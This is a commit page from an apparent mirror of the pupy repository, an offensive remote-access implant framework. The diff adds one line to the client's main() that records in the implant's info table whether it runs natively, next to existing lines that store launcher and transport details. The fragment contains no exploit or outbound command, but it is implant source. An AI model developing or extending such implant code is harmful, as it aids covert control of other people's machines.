mirror of https://github.com/n1nj4sec/pupy.git
Provide client/non-client status
This commit is contained in:
parent
b732a93488
commit
47c871626f
|
@ -256,6 +256,7 @@ def main():
|
||||||
pupy.infos['launcher_args'] = LAUNCHER_ARGS
|
pupy.infos['launcher_args'] = LAUNCHER_ARGS
|
||||||
pupy.infos['launcher_inst'] = launcher
|
pupy.infos['launcher_inst'] = launcher
|
||||||
pupy.infos['transport'] = launcher.get_transport()
|
pupy.infos['transport'] = launcher.get_transport()
|
||||||
|
pupy.infos['native'] = not getattr(pupy, 'pseudo', False)
|
||||||
|
|
||||||
exited = False
|
exited = False
|
||||||
|
|
||||||
|
|
Loading…
Reference in New Issue